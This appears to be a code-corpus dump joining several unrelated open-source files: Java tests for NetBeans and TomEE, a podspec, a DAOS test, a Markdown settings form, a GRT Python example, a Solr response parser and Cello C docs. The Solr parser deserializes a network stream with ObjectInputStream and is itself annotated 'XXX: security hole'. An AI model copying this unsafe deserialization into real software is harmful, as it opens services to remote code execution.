* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.web.jsf.metamodel;
import java.beans.PropertyChangeEvent;
import java.beans.PropertyChangeListener;
import java.io.IOException;
import java.util.List;
import org.netbeans.modules.j2ee.metadata.model.api.MetadataModel;
import org.netbeans.modules.j2ee.metadata.model.api.MetadataModelAction;
import org.netbeans.modules.j2ee.metadata.model.support.TestUtilities;
import org.netbeans.modules.web.jsf.api.facesmodel.Application;
import org.netbeans.modules.web.jsf.api.metamodel.FacesManagedBean;
import org.netbeans.modules.web.jsf.api.metamodel.JsfModel;
import org.netbeans.modules.xml.xam.AbstractModelFactory;
import org.openide.filesystems.FileObject;
/**
* @author ads
*
*/
public class SeveralXmlModelTest extends CommonTestCase {
public SeveralXmlModelTest( String testName ) {
super(testName);
}
public void testSeveralModelInSrc() throws IOException, InterruptedException{
TestUtilities.copyStringToFileObject(srcFO, "WEB-INF/faces-config.xml",
getFileContent("data/faces-config.xml"));
TestUtilities.copyStringToFileObject(srcFO, "META-INF/one.faces-config.xml",
getFileContent("data/one.faces-config.xml"));
TestUtilities.copyStringToFileObject(srcFO, "META-INF/two.faces-config.xml",
getFileContent("data/two.faces-config.xml"));
createJsfModel().runReadAction(new MetadataModelAction<JsfModel,Void>(){
public Void run( JsfModel model ) throws Exception {
assertEquals( 3 , model.getModels().size());
assertNotNull( model.getMainConfig() );
assertEquals( 3 , model.getFacesConfigs().size());
List<Application> applications = model.getElements( Application.class);
assertEquals( 2 , applications.size());
Application withSystemEventListener= null;
for (Application application : applications) {
if ( application.getSystemEventListeners().size() == 1){
withSystemEventListener = application;
}
}
assertNotNull( "one application should have " +
"child system event listener", withSystemEventListener );
Application empty =
applications.get( 0 ).equals( withSystemEventListener) ?
applications.get( 1 ) : applications.get(0);
assertEquals( "one application should be empty", 0, empty.getChildren().size());
return null;
}
});
}
public void testRemoveModelInSrc() throws IOException, InterruptedException{
TestUtilities.copyStringToFileObject(srcFO, "WEB-INF/faces-config.xml",
getFileContent("data/faces-config.xml"));
TestUtilities.copyStringToFileObject(srcFO, "META-INF/one.faces-config.xml",
getFileContent("data/one.faces-config.xml"));
TestUtilities.copyStringToFileObject(srcFO, "META-INF/two.faces-config.xml",
getFileContent("data/two.faces-config.xml"));
createJsfModel().runReadAction(new MetadataModelAction<JsfModel,Void>(){
public Void run( JsfModel model ) throws Exception {
PropListener l = new PropListener();
model.addPropertyChangeListener(l);
srcFO.getFileObject("META-INF/two.faces-config.xml").delete();
l.waitForModelUpdate();
assertEquals( 2 , model.getModels().size());
assertEquals( 2 , model.getFacesConfigs().size());
List<Application> applications = model.getElements( Application.class);
assertEquals( 1 , applications.size());
return null;
}
});
}
public void testAddModelInSrc() throws IOException, InterruptedException{
FileObject fileObject = srcFO.getFileObject("META-INF/one.faces-config.xml");
if ( fileObject!= null ){
fileObject.delete();
}
TestUtilities.copyStringToFileObject(srcFO, "META-INF/one.faces-config.xml",
getFileContent("data/one.faces-config.xml"));
TestUtilities.copyStringToFileObject(srcFO, "META-INF/two.faces-config.xml",
getFileContent("data/two.faces-config.xml"));
createJsfModel().runReadAction(new MetadataModelAction<JsfModel,Void>(){
public Void run( JsfModel model ) throws Exception {
assertEquals( 2 , model.getModels().size());
List<Application> applications = model.getElements( Application.class);
assertEquals( 1 , applications.size());
PropListener l = new PropListener();
model.addPropertyChangeListener(l);
TestUtilities.copyStringToFileObject(srcFO, "WEB-INF/faces-config.xml",
getFileContent("data/faces-config.xml"));
l.waitForModelUpdate();
assertEquals( 3 , model.getModels().size());
assertEquals( 3 , model.getFacesConfigs().size());
applications = model.getElements( Application.class);
assertEquals( 2 , applications.size());
return null;
}
});
}
public void testPrettyFacesModel() throws IOException, InterruptedException {
TestUtilities.copyStringToFileObject(srcFO, "META-INF/faces-config-prettyFaces.xml", getFileContent("data/faces-config-prettyFaces.xml"));
createJsfModel().runReadAction(new MetadataModelAction<JsfModel, Void>() {
@Override
public Void run(JsfModel model) throws Exception {
assertEquals(0, model.getModels().size());
PropListener l = new PropListener();
model.addPropertyChangeListener(l);
TestUtilities.copyStringToFileObject(srcFO, "WEB-INF/faces-config.xml", getFileContent("data/faces-config.xml"));
l.waitForModelUpdate();
assertEquals(1, model.getModels().size());
assertEquals(1, model.getFacesConfigs().size());
List<Application> applications = model.getElements(Application.class);
assertEquals(1, applications.size());
return null;
}
});
}
public void testModelBeanCompletion() throws Exception {
FileObject fileObject = srcFO.getFileObject("META-INF/one.faces-config.xml");
if (fileObject != null) {
fileObject.delete();
}
TestUtilities.copyStringToFileObject(srcFO, "META-INF/faces-config.xml",
getFileContent("data/faces-config.xml"));
MetadataModel<JsfModel> jsfModel = createJsfModel();
jsfModel.runReadAction(new MetadataModelAction<JsfModel, Void>() {
public Void run(JsfModel model) throws Exception {
List<FacesManagedBean> elements = model.getElements(FacesManagedBean.class);
assertEquals(1 , elements.size());
return null;
}
});
// wait threshold for next possible XDM model update invokation
Thread.sleep(AbstractModelFactory.DELAY_DIRTY);
jsfModel.runReadAction(new MetadataModelAction<JsfModel, Void>() {
public Void run(JsfModel model) throws Exception {
// change content of the file and put there MDB without specified class
PropListener l = new PropListener();
model.getFacesConfigs().get(0).getModel().addPropertyChangeListener(l);
TestUtilities.copyStringToFileObject(srcFO, "META-INF/faces-config.xml",
getFileContent("data/three.faces-config.xml"));
l.waitForModelUpdate();
// ManagedBeans without specified class shouldn't be returned
List<FacesManagedBean> elements = model.getElements(FacesManagedBean.class);
assertEquals(0 , elements.size());
return null;
}
});
}
/**
* File change events (which cause reload of list of configuration files) are
* fired in separate thread and to synchronize on delivery of these events
* we wait on a property change event.
*/
static class PropListener implements PropertyChangeListener {
private boolean modelUpdated = false;
@Override
public synchronized void propertyChange(PropertyChangeEvent evt) {
modelUpdated = true;
}
public void waitForModelUpdate() throws InterruptedException {
while (!isModelUpdated()) {
Thread.sleep(100);
}
}
public synchronized boolean isModelUpdated() {
return modelUpdated;
}
}
}
| 4,196 |
5,169 | {
"name": "CSSSelectorConverter",
"version": "1.1.1",
"license": "MIT",
"summary": "Objective-C/Cocoa String Tokenizer and Parser toolkit. Supports Grammars.",
"homepage": "https://github.com/siuying/CSSSelectorConverter",
"authors": {
"<NAME>": "<EMAIL>"
},
"source": {
"git": "https://github.com/siuying/CSSSelectorConverter.git",
"tag": "1.1.1",
"submodules": true
},
"description": "\n A CSS Selector to XPath Selector for Objective-C. Support mostly used subset of CSS Selector Level 3.\n ",
"platforms": {
"ios": "6.0",
"osx": "10.8"
},
"dependencies": {
"CocoaLumberjack": [
"~> 1.9.0"
]
},
"requires_arc": true,
"subspecs": [
{
"name": "Core",
"source_files": "CSSSelectorConverter/CSS*.{m,h}",
"prefix_header_contents": "#import \"CSSSelectorConverter.h\"",
"requires_arc": true,
"resources": "CSSSelectorConverter/*.{txt,plist}",
"dependencies": {
"CSSSelectorConverter/CoreParse": [
]
}
},
{
"name": "CoreParse",
"source_files": "vendor/CoreParse/CoreParse/**/*.{h,m}",
"exclude_files": "vendor/CoreParse/CoreParse/CPSenTestKitAssertions.h",
"requires_arc": false
}
]
}
| 570 |
429 | <filename>src/tests/ftest/io/small_file_count.py
#!/usr/bin/python
"""
(C) Copyright 2020-2021 Intel Corporation.
SPDX-License-Identifier: BSD-2-Clause-Patent
"""
from file_count_test_base import FileCountTestBase
class SmallFileCount(FileCountTestBase):
# pylint: disable=too-many-ancestors
"""Test class Description: Runs IOR and MDTEST to create large number of files.
:avocado: recursive
"""
def test_smallfilecount(self):
"""Jira ID: DAOS-3845.
Test Description:
Run IOR and MDTEST with 30 clients with smaller file counts.
Use Cases:
Run IOR for 5 mints with DFS and POSIX and create 30 x 2G files
Run MDTEST to create 50K files with DFS and POSIX
:avocado: tags=all,daily_regression
:avocado: tags=hw,large
:avocado: tags=daosio,dfuse
:avocado: tags=smallfilecount
"""
self.run_file_count()
| 385 |
921 | <filename>src/main/java/com/vladsch/md/nav/settings/MdHtmlSettingsForm.java
// Copyright (c) 2015-2020 <NAME> <<EMAIL>> Use of this source code is governed by the Apache 2.0 license that can be found in the LICENSE file.
package com.vladsch.md.nav.settings;
import com.intellij.openapi.application.ApplicationManager;
import com.intellij.openapi.application.ModalityState;
import com.intellij.openapi.editor.colors.EditorColorsScheme;
import com.intellij.openapi.editor.ex.EditorEx;
import com.intellij.openapi.editor.highlighter.EditorHighlighter;
import com.intellij.openapi.fileTypes.FileType;
import com.intellij.openapi.project.Project;
import com.intellij.openapi.ui.ComboBox;
import com.intellij.ui.CollectionComboBoxModel;
import com.intellij.ui.components.JBCheckBox;
import com.intellij.uiDesigner.core.GridConstraints;
import com.intellij.uiDesigner.core.GridLayoutManager;
import com.intellij.util.containers.ContainerUtil;
import com.vladsch.md.nav.editor.resources.TextHtmlGeneratorProvider;
import com.vladsch.md.nav.editor.util.HtmlGeneratorProvider;
import com.vladsch.md.nav.editor.util.HtmlPanelProvider;
import com.vladsch.md.nav.settings.api.SettingsFormImpl;
import com.vladsch.plugin.util.ui.Settable;
import com.vladsch.plugin.util.ui.SettingsComponents;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;
import javax.swing.JComponent;
import javax.swing.JPanel;
import java.awt.Container;
import java.awt.Dimension;
import java.awt.event.ActionListener;
import java.awt.event.ItemEvent;
import java.util.HashMap;
import java.util.List;
import java.util.Map;
import java.util.Objects;
public class MdHtmlSettingsForm extends SettingsFormImpl {
private JPanel myMainPanel;
ComboBox<HtmlGeneratorProvider.Info> myHtmlProviders;
JBCheckBox myHeadTopEnabled;
JBCheckBox myHeadBottomEnabled;
JBCheckBox myBodyTopEnabled;
JBCheckBox myBodyBottomEnabled;
JBCheckBox myAddDocTypeHtml;
CustomizableEditorTextField myHeadTop;
CustomizableEditorTextField myHeadBottom;
CustomizableEditorTextField myBodyTop;
CustomizableEditorTextField myBodyBottom;
JBCheckBox myAddPageHeader;
JBCheckBox myAddAnchorLinks;
JBCheckBox myAnchorLinksWrapText;
JBCheckBox myImageUriSerials;
JBCheckBox myNoParaTags;
JBCheckBox myDefaultUrlTitle;
@SuppressWarnings("unused") private JPanel myExtensionsPanel;
@Nullable private ActionListener myUpdateListener;
@NotNull CollectionComboBoxModel<HtmlGeneratorProvider.Info> myHtmlProvidersModel;
@NotNull HtmlGeneratorProvider.Info myHtmlProviderLastItem;
@Nullable private Map<JBCheckBox, CustomizableEditorTextField> checkBoxEditorMap;
HtmlPanelProvider.Info myLastPanelProviderInfo;
final boolean myAllowPlainTextHtmlGenerator;
@NotNull
public JComponent getComponent() {
return myMainPanel;
}
private final SettingsComponents<MdHtmlSettings> components;
public MdHtmlSettingsForm(RenderingProfileSynchronizer profileSynchronizer, boolean allowPlainTextHtmlGenerator) {
super(profileSynchronizer);
components = new SettingsComponents<MdHtmlSettings>() {
@Override
protected Settable<MdHtmlSettings>[] createComponents(@NotNull MdHtmlSettings i) {
JComponentGetter<CustomizableEditorTextField, String> textEditorGetter = component -> getEditorTextFieldText(component);
JComponentSetter<CustomizableEditorTextField, String> textEditorSetter = (component, value) -> updateEditorTextFieldText(component, value);
//noinspection unchecked
return new Settable[] {
notrace("myHeadTopEnabled", component(myHeadTopEnabled, i::getHeadTopEnabled, i::setHeadTopEnabled)),
notrace("myHeadBottomEnabled", component(myHeadBottomEnabled, i::getHeadBottomEnabled, i::setHeadBottomEnabled)),
notrace("myBodyTopEnabled", component(myBodyTopEnabled, i::getBodyTopEnabled, i::setBodyTopEnabled)),
notrace("myBodyBottomEnabled", component(myBodyBottomEnabled, i::getBodyBottomEnabled, i::setBodyBottomEnabled)),
notrace("myAddDocTypeHtml", component(myAddDocTypeHtml, i::getAddDocTypeHtml, i::setAddDocTypeHtml)),
notrace("myAddPageHeader", component(myAddPageHeader, i::getAddPageHeader, i::setAddPageHeader)),
notrace("myAddAnchorLinks", component(myAddAnchorLinks, i::getAddAnchorLinks, i::setAddAnchorLinks)),
notrace("myAnchorLinksWrapText", component(myAnchorLinksWrapText, i::getAnchorLinksWrapText, i::setAnchorLinksWrapText)),
notrace("myImageUriSerials", component(myImageUriSerials, i::getImageUriSerials, i::setImageUriSerials)),
notrace("myNoParaTags", component(myNoParaTags, i::getNoParaTags, i::setNoParaTags)),
trace("myDefaultUrlTitle", component(myDefaultUrlTitle, i::getDefaultUrlTitle, i::setDefaultUrlTitle)),
new Settable<ComboBox<HtmlGeneratorProvider.Info>>() {
@Override
public void reset() {
myHtmlProviderLastItem = i.getHtmlGeneratorProviderInfo();
myHtmlProvidersModel.setSelectedItem(myHtmlProviderLastItem);
}
@Override
public void apply() {
i.setHtmlGeneratorProviderInfo(myHtmlProviderLastItem);
}
@Override
public boolean isModified() {
return !Objects.equals(i.getHtmlGeneratorProviderInfo(), myHtmlProviderLastItem);
}
@Override
public ComboBox<HtmlGeneratorProvider.Info> getComponent() {
return myHtmlProviders;
}
},
notrace("myHeadTop", component(myHeadTop, textEditorGetter, textEditorSetter, i::getHeadTop, i::setHeadTop)),
notrace("myHeadBottom", component(myHeadBottom, textEditorGetter, textEditorSetter, i::getHeadBottom, i::setHeadBottom)),
notrace("myBodyTop", component(myBodyTop, textEditorGetter, textEditorSetter, i::getBodyTop, i::setBodyTop)),
notrace("myBodyBottom", component(myBodyBottom, textEditorGetter, textEditorSetter, i::getBodyBottom, i::setBodyBottom)),
};
}
};
myAllowPlainTextHtmlGenerator = allowPlainTextHtmlGenerator;
myLastPanelProviderInfo = getPanelProviderInfo();
myHtmlProvidersModel = getHtmlProvidersModel(getPanelProvider());
myHtmlProviderLastItem = MdHtmlSettings.Companion.getDefaultSettings(myLastPanelProviderInfo).getHtmlGeneratorProviderInfo();
onFormCreated();
}
private void createUIComponents() {
myUpdateListener = e -> updateFormOnReshow(false);
myHeadTopEnabled = new JBCheckBox();
myHeadBottomEnabled = new JBCheckBox();
myBodyTopEnabled = new JBCheckBox();
myBodyBottomEnabled = new JBCheckBox();
myAddDocTypeHtml = new JBCheckBox();
myNoParaTags = new JBCheckBox();
myHeadTopEnabled.addActionListener(myUpdateListener);
myHeadBottomEnabled.addActionListener(myUpdateListener);
myBodyTopEnabled.addActionListener(myUpdateListener);
myBodyBottomEnabled.addActionListener(myUpdateListener);
myAddDocTypeHtml.addActionListener(myUpdateListener);
myNoParaTags.addActionListener(myUpdateListener);
CustomizableEditorTextField.EditorCustomizationListener editorCustomizationListener = new CustomizableEditorTextField.EditorCustomizationListener() {
@Override
public boolean editorCreated(@NotNull EditorEx editor, @Nullable Project project) {
updateFormOnReshow(false);
return true;
}
@Nullable
@Override
public EditorHighlighter getHighlighter(Project project, @NotNull FileType fileType, @NotNull EditorColorsScheme settings) {
return null;
}
};
myHeadTop = createCustomizableTextFieldEditor(editorCustomizationListener, "html");
myHeadBottom = createCustomizableTextFieldEditor(editorCustomizationListener, "html");
myBodyTop = createCustomizableTextFieldEditor(editorCustomizationListener, "html");
myBodyBottom = createCustomizableTextFieldEditor(editorCustomizationListener, "html");
checkBoxEditorMap = new HashMap<>();
checkBoxEditorMap.put(myHeadTopEnabled, myHeadTop);
checkBoxEditorMap.put(myHeadBottomEnabled, myHeadBottom);
checkBoxEditorMap.put(myBodyTopEnabled, myBodyTop);
checkBoxEditorMap.put(myBodyBottomEnabled, myBodyBottom);
myHtmlProvidersModel = getHtmlProvidersModel(getPanelProvider());
myHtmlProviders = new ComboBox<>(myHtmlProvidersModel);
myHtmlProviders.addItemListener(e -> {
final Object item = e.getItem();
if (e.getStateChange() != ItemEvent.SELECTED || !(item instanceof HtmlGeneratorProvider.Info)) {
return;
}
myHtmlProviderLastItem = (HtmlGeneratorProvider.Info) item;
updateOptionalSettings();
});
myExtensionsPanel = getExtensionsPanel();
}
@Override
protected void updatePanelProviderDependentComponents(@NotNull HtmlPanelProvider fromProvider, @NotNull HtmlPanelProvider toProvider, boolean isInitialShow) {
MdHtmlSettings htmlSettings = new MdHtmlSettings();
components.apply(htmlSettings);
htmlSettings.changeToProvider(fromProvider.getINFO(), toProvider.getINFO());
myLastPanelProviderInfo = toProvider.getINFO();
components.reset(htmlSettings);
myHtmlProviderLastItem = htmlSettings.getHtmlGeneratorProvider().getINFO();
myHtmlProvidersModel = getHtmlProvidersModel(toProvider);
myHtmlProviders.setModel(myHtmlProvidersModel);
myHtmlProvidersModel.setSelectedItem(myHtmlProviderLastItem);
myHtmlProviders.setSelectedItem(myHtmlProviderLastItem);
}
public void updateFormOnReshow(boolean isInitialShow) {
if (checkBoxEditorMap == null) return;
int enabledEditors = 0;
for (JBCheckBox checkBox : checkBoxEditorMap.keySet()) {
CustomizableEditorTextField editorTextField = checkBoxEditorMap.get(checkBox);
MdSettableFormBase.updateEditorTextFieldEditable(editorTextField, checkBox.isSelected());
if (checkBox.isSelected()) enabledEditors++;
}
Dimension unconstrainedSize = new Dimension(-1, -1);
Dimension constrainedSize = new Dimension(-1, 0);
for (JBCheckBox checkBox : checkBoxEditorMap.keySet()) {
CustomizableEditorTextField editorTextField = checkBoxEditorMap.get(checkBox);
Container parent = editorTextField.getParent();
GridLayoutManager gridLayoutManager = (GridLayoutManager) parent.getParent().getLayout();
GridConstraints constraints = gridLayoutManager.getConstraintsForComponent(parent);
if (checkBox.isSelected() || enabledEditors == 0 || enabledEditors == 4) {
parent.setPreferredSize(unconstrainedSize);
parent.setMaximumSize(unconstrainedSize);
constraints.setFill(GridConstraints.FILL_BOTH);
constraints.setVSizePolicy(GridConstraints.SIZEPOLICY_CAN_GROW | GridConstraints.SIZEPOLICY_CAN_SHRINK);
} else {
parent.setPreferredSize(constrainedSize);
parent.setMaximumSize(constrainedSize);
constraints.setFill(GridConstraints.FILL_HORIZONTAL);
constraints.setAnchor(GridConstraints.ANCHOR_NORTH);
constraints.setVSizePolicy(GridConstraints.SIZEPOLICY_FIXED);
}
gridLayoutManager.invalidateLayout(parent);
}
myMainPanel.invalidate();
}
@Override
protected JPanel getMainFormPanel() {
return myMainPanel;
}
@Override
public void updateOptionalSettings() {
HtmlGeneratorProvider panelProvider = HtmlGeneratorProvider.Companion.getFromInfoOrDefault(myHtmlProviderLastItem);
myAddPageHeader.setEnabled(panelProvider.isSupportedSetting(MdHtmlSettings.ADD_PAGE_HEADER));
myAddDocTypeHtml.setEnabled(panelProvider.isSupportedSetting(MdHtmlSettings.ADD_DOC_TYPE_HTML));
updateExtensionsOptionalSettings();
}
@NotNull
private CollectionComboBoxModel<HtmlGeneratorProvider.Info> getHtmlProvidersModel(@NotNull HtmlPanelProvider panelProvider) {
List<HtmlGeneratorProvider.Info> providersInfo = getCompatibleGeneratorProvidersInfo(panelProvider);
return new CollectionComboBoxModel<>(providersInfo, providersInfo.get(0));
}
@NotNull
private List<HtmlGeneratorProvider.Info> getCompatibleGeneratorProvidersInfo(@NotNull HtmlPanelProvider panelProvider) {
HtmlGeneratorProvider[] extensions = HtmlGeneratorProvider.Companion.getEP_NAME().getExtensions();
return ContainerUtil.mapNotNull(extensions, provider -> {
if (provider.getHAS_PARENT()) {
// dedicated CSS to another provider, not for generic panel use
return null;
}
if (provider.getINFO().getProviderId().equals(TextHtmlGeneratorProvider.INSTANCE.getID())) {
// unmodified HTML generator, this is selected by preview type settings
if (!myAllowPlainTextHtmlGenerator) return null;
} else if (!provider.getCOMPATIBILITY().isForAvailable(panelProvider.getCOMPATIBILITY())) {
// not compatible with current browser
return null;
}
return provider.getINFO();
});
}
@Override
public void reset(@NotNull final MdRenderingProfileHolder settings) {
components.reset(settings.getHtmlSettings());
resetExtensions(settings);
updateOptionalSettings();
if (!myInitialShow) {
// if already initialized then update, otherwise the first show will do it
ApplicationManager.getApplication().invokeLater(() -> updateFormOnReshow(false), ModalityState.any());
}
if (myUpdateListener != null) myUpdateListener.actionPerformed(null);
}
@Override
public void apply(@NotNull final MdRenderingProfileHolder settings) {
components.apply(settings.getHtmlSettings());
applyExtensions(settings);
}
@Override
public boolean isModified(@NotNull final MdRenderingProfileHolder settings) {
return components.isModified(settings.getHtmlSettings()) || isModifiedExtensions(settings);
}
@Override
protected void disposeResources() {
myHeadTop = null;
myHeadBottom = null;
myBodyTop = null;
myBodyBottom = null;
}
}
| 6,203 |
378 | <reponame>CristianDVN/tomee
/**
*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.openejb.core.stateful;
import org.apache.openejb.OpenEJB;
import org.apache.openejb.jee.EnterpriseBean;
import org.apache.openejb.jee.StatefulBean;
import org.apache.openejb.junit.ApplicationComposer;
import org.apache.openejb.testing.AppResource;
import org.apache.openejb.testing.Module;
import org.junit.Test;
import org.junit.runner.RunWith;
import javax.annotation.PostConstruct;
import javax.annotation.PreDestroy;
import javax.ejb.Remove;
import javax.ejb.TransactionAttribute;
import javax.ejb.TransactionAttributeType;
import javax.naming.Context;
import javax.naming.NamingException;
import javax.transaction.SystemException;
import static org.junit.Assert.assertTrue;
import static org.junit.Assert.fail;
@RunWith(ApplicationComposer.class)
public class StatefulTransactionInCallbacksTest {
@Module
public EnterpriseBean bean() {
return new StatefulBean(TransactionBean.class).localBean();
}
@AppResource
private Context ctx;
@Test
public void create() throws NamingException {
final TransactionBean bean = (TransactionBean) ctx.lookup("java:global/StatefulTransactionInCallbacksTest/bean/TransactionBean");
// contruct was ok
bean.remove();
// destroy was ok
}
public static class TransactionBean {
@PostConstruct
@TransactionAttribute(TransactionAttributeType.REQUIRES_NEW)
public void hasTxConstruct() {
try {
assertTrue(OpenEJB.getTransactionManager().getTransaction() != null);
} catch (final SystemException e) {
fail(e.getMessage());
}
}
@PreDestroy
@TransactionAttribute(TransactionAttributeType.REQUIRES_NEW)
public void hasTxDestroy() {
try {
assertTrue(OpenEJB.getTransactionManager().getTransaction() != null);
} catch (final SystemException e) {
fail(e.getMessage());
}
}
@Remove
public void remove() {
// no-op
}
}
}
| 1,063 |
818 | import GRT
import sys
import argparse
def main():
'''GRT ZeroCrossingCounter Example
This example demonstrates how to create and use the GRT ZeroCrossingCounter FeatureExtraction Module.
The ZeroCrossingCounter module counts the number of zero crossings that occur in an N dimensional signal
over a given window. The ZeroCrossingCounter class is good for extracting features that describe how much
change is occurring in an N dimensional signal. An example application might be to use the ZeroCrossingCounter
in combination with one of the GRT classification algorithms to determine if an object is being shaken, and
if so, how the object is being shaken.
In this example we create an instance of a ZeroCrossingCounter and use this to extract some features from a
recording of some acceleration data. The recording contains a number of different types of the accelerometer
being shaken, you can see a plot of the raw data here:
http://www.nickgillian.com/archive/wiki/grt/reference/ZeroCrossingCounter/ZeroCrossingCounterFeatureExtractionExampleImage1.jpg
The raw data and features are then saved to a file (so you can plot the results in Matlab, Excel, etc. if needed).
This example shows you how to:
- Create a new ZeroCrossingCounter instance and customize the feature settings
- Compute some features from a 3 dimensional data signal
- Save the ZeroCrossingCounter settings to a file
- Load the ZeroCrossingCounter settings from a file'''
# Parse the data filename from the argument list
parser = argparse.ArgumentParser(description='Process some data.')
parser.add_argument('filename', help='A data file')
args = parser.parse_args()
# Load the example data
data = GRT.ClassificationData()
if not data.load(args.filename):
print("ERROR: Failed to load data from file!")
sys.exit(1)
# The variables used to initialize the zero crossing counter feature extraction
searchWindowSize = 20
deadZoneThreshold = 0.01
numDimensions = data.getNumDimensions()
# This could also be ZeroCrossingCounter::COMBINED_FEATURE_MODE
featureMode = GRT.ZeroCrossingCounter.INDEPENDANT_FEATURE_MODE
# Create a new instance of the ZeroCrossingCounter feature extraction
zeroCrossingCounter = GRT.ZeroCrossingCounter(searchWindowSize,deadZoneThreshold,numDimensions,featureMode)
# Loop over the accelerometer data, at each time sample (i) compute the features
# using the new sample and then write the results to a file
for i in range(data.getNumSamples()):
# Compute the features using this new sample
zeroCrossingCounter.computeFeatures( data.get(i).getSample() )
# Write the data
print("InputVector: " + str(data.get(i).getSample()))
# Get the latest feature vector
print("FeatureVector: " + str(zeroCrossingCounter.getFeatureVector()))
# Save the MovementIndex settings to a file
zeroCrossingCounter.save("MovementIndexSettings.grt")
# You can then load the settings again if you need them
zeroCrossingCounter.load("MovementIndexSettings.grt")
if __name__ == '__main__':
main()
sys.exit(0)
| 964 |
585 | /*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.solr.analytics.stream;
import org.apache.lucene.util.SuppressForbidden;
import org.apache.solr.analytics.AnalyticsRequestManager;
import org.apache.solr.client.solrj.ResponseParser;
import org.apache.solr.common.SolrException;
import org.apache.solr.common.SolrException.ErrorCode;
import org.apache.solr.common.util.NamedList;
import org.apache.solr.handler.AnalyticsHandler;
import java.io.DataInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.ObjectInputStream;
import java.io.Reader;
/**
* This parser initiates a merge of an Analytics Shard Response, sent from the {@link AnalyticsHandler}.
*
* The input stream is immediately sent to the given {@link AnalyticsRequestManager} to merge.
*/
public class AnalyticsShardResponseParser extends ResponseParser {
public static final String BINARY_CONTENT_TYPE = "application/octet-stream";
public static final String STREAM = "application/octet-stream";
private final AnalyticsRequestManager manager;
/**
*
* @param manager the manager of the current Analytics Request, will manage the merging of shard data
*/
public AnalyticsShardResponseParser(AnalyticsRequestManager manager) {
this.manager = manager;
}
@Override
public String getWriterType() {
return "analytics_shard_stream";
}
@Override
@SuppressForbidden(reason = "XXX: security hole")
public NamedList<Object> processResponse(InputStream body, String encoding) {
DataInputStream input = new DataInputStream(body);
//check to see if the response is an exception
NamedList<Object> exception = new NamedList<>();
try {
if (input.readBoolean()) {
manager.importShardData(input);
} else {
exception.add("Exception", new ObjectInputStream(input).readObject());
}
} catch (IOException e) {
exception.add("Exception", new SolrException(ErrorCode.SERVER_ERROR, "Couldn't process analytics shard response", e));
} catch (ClassNotFoundException e1) {
throw new RuntimeException(e1);
}
return exception;
}
@Override
public String getContentType() {
return BINARY_CONTENT_TYPE;
}
@Override
public String getVersion() {
return "1";
}
@Override
public NamedList<Object> processResponse(Reader reader) {
throw new RuntimeException("Cannot handle character stream");
}
}
| 925 |
4,067 | #include "Cello.h"
static const char* Current_Name(void) {
return "Current";
}
static const char* Current_Brief(void) {
return "Implicit Object";
}
static const char* Current_Description(void) {
return
"The `Current` class can be implemented by types which have implicit "
"instances associated with them. For example it can be used to retrieve "
"the _current_ `Thread`, or it could be used to get the _current_ Garbage "
"Collector."
"\n\n"
"This class may be implemented by types which express the [Singleton "
"Design Pattern](http://en.wikipedia.org/wiki/Singleton_pattern)";
}
static const char* Current_Definition(void) {
return
"struct Current {\n"
" var (*current)(void);\n"
"};\n";
}
static struct Example* Current_Examples(void) {
static struct Example examples[] = {
{
"Usage",
"var gc = current(GC);\n"
"show(gc);\n"
"var thread = current(Thread);\n"
"show(thread);\n"
}, {NULL, NULL}
};
return examples;
}
static struct Method* Current_Methods(void) {
static struct Method methods[] = {
{
"current",
"var current(var type);",
"Returns the current active object of the given `type`."
}, {NULL, NULL, NULL}
};
return methods;
}
var Current = Cello(Current,
Instance(Doc,
Current_Name, Current_Brief, Current_Description,
Current_Definition, Current_Examples, Current_Methods));
var current(var type) {
return type_method(type, Current, current);
}
struct Thread {
var func;
var args;
var tls;
bool is_main;
bool is_running;
#if defined(CELLO_UNIX)
pthread_t thread;
#elif defined(CELLO_WINDOWS)
DWORD id;
HANDLE thread;
#endif
};
static const char* Thread_Name(void) {
return "Thread";
}
static const char* Thread_Brief(void) {
return "Concurrent Execution";
}
static const char* Thread_Description(void) {
return
"The `Thread` type provides a basic primitive for concurrent "
"execution. It acts as a basic wrapper around operating system threads, "
"using WinThreads on Windows and pthreads otherwise.";
}
static struct Example* Thread_Examples(void) {
static struct Example examples[] = {
{
"Usage",
"var set_value(var args) {\n"
" assign(get(args, $I(0)), $I(1));\n"
" return NULL;\n"
"}\n"
"\n"
"var i = $I(0);\n"
"\n"
"var x = new(Thread, $(Function, set_value));\n"
"call(x, i);\n"
"join(x);\n"
"\n"
"show(i); /* 1 */\n"
}, {
"Exclusive Resource",
"var increment(var args) {\n"
" var mut = get(args, $I(0));\n"
" var tot = get(args, $I(1));\n"
" lock(mut);\n"
" assign(tot, $I(c_int(tot)+1));\n"
" unlock(mut);\n"
" return NULL;\n"
"}\n"
"\n"
"var mutex = new(Mutex);\n"
"var total = $I(0);\n"
"\n"
"var threads = new(Array, Box,\n"
" new(Thread, $(Function, increment)),\n"
" new(Thread, $(Function, increment)),\n"
" new(Thread, $(Function, increment)));\n"
"\n"
"show(total); /* 0 */\n"
"\n"
"foreach (t in threads) {\n"
" call(deref(t), mutex, total);\n"
"}\n"
"\n"
"foreach (t in threads) {\n"
" join(deref(t));\n"
"}\n"
"\n"
"show(total); /* 3 */\n"
}, {NULL, NULL}
};
return examples;
}
